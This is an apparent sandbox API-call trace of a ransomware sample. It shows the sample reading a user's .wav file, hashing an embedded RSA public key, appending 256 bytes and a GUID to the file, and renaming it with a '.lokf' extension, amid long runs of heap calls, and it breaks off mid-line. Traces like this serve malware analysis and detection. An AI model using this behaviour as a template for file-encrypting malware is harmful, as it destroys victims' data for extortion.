[0059.993] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x8937, lpOverlapped=0x0) returned 1 [0059.993] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.993] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.993] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.993] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.994] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.994] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.994] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.994] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.994] GetLastError () returned 0x0 [0059.994] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.994] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.994] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.994] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.994] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.995] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.995] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.995] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8937, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.995] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.995] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.995] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.995] CloseHandle (hObject=0x5cc) returned 1 [0059.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a90 [0059.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.996] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\zoG7hAdVK.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\zog7hadvk.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\zoG7hAdVK.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\zog7hadvk.wav.lokf")) returned 1 [0059.997] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a6a55a0, ftCreationTime.dwHighDateTime=0x1d4c6b7, ftLastAccessTime.dwLowDateTime=0xbdddd1d0, ftLastAccessTime.dwHighDateTime=0x1d4d273, ftLastWriteTime.dwLowDateTime=0xbdddd1d0, ftLastWriteTime.dwHighDateTime=0x1d4d273, nFileSizeHigh=0x0, nFileSizeLow=0x8937, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zoG7hAdVK.wav", cAlternateFileName="ZOG7HA~1.WAV")) returned 0 [0059.997] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.998] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.998] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.003] RtlAllocateHeap (HeapHandle=0x660000, 